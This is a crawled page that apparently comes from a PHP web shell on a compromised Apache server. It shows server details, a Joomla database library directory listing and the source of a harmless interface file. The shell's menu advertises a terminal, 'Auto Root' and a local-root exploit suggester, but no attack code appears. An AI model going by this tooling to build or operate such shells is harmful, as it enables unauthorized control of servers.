Linux anchor 4.4.0-210-generic #242-Ubuntu SMP Fri Apr 16 09:57:56 UTC 2021 x86_64
Apache/2.4.18 (Ubuntu)
Server IP : 10.10.100.4 & Your IP : 216.73.217.150
Domains :
Cant Read [ /etc/named.conf ]
User : www-data
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
var /
www /
html /
teste /
libraries /
joomla /
database /
Delete
Unzip
Name
Size
Permission
Date
Action
driver
[ DIR ]
drwxr-xr-x
2017-10-04 08:52
exception
[ DIR ]
drwxr-xr-x
2017-10-04 08:52
exporter
[ DIR ]
drwxr-xr-x
2017-10-04 08:52
importer
[ DIR ]
drwxr-xr-x
2017-10-04 08:52
iterator
[ DIR ]
drwxr-xr-x
2017-10-04 08:52
query
[ DIR ]
drwxr-xr-x
2017-10-04 08:52
database.php
5.2
KB
-rw-r--r--
2017-10-04 08:52
driver.php
54.85
KB
-rw-r--r--
2017-10-04 08:52
exporter.php
4.4
KB
-rw-r--r--
2017-10-04 08:52
factory.php
5.35
KB
-rw-r--r--
2017-10-04 08:52
importer.php
4.84
KB
-rw-r--r--
2017-10-04 08:52
interface.php
549
B
-rw-r--r--
2017-10-04 08:52
iterator.php
3.63
KB
-rw-r--r--
2017-10-04 08:52
query.php
43.42
KB
-rw-r--r--
2017-10-04 08:52
Save
Rename
<?php /** * @package Joomla.Platform * @subpackage Database * * @copyright Copyright (C) 2005 - 2017 Open Source Matters, Inc. All rights reserved. * @license GNU General Public License version 2 or later; see LICENSE */ defined('JPATH_PLATFORM') or die; /** * Joomla Platform Database Interface * * @since 11.2 */ interface JDatabaseInterface { /** * Test to see if the connector is available. * * @return boolean True on success, false otherwise. * * @since 11.2 */ public static function isSupported(); }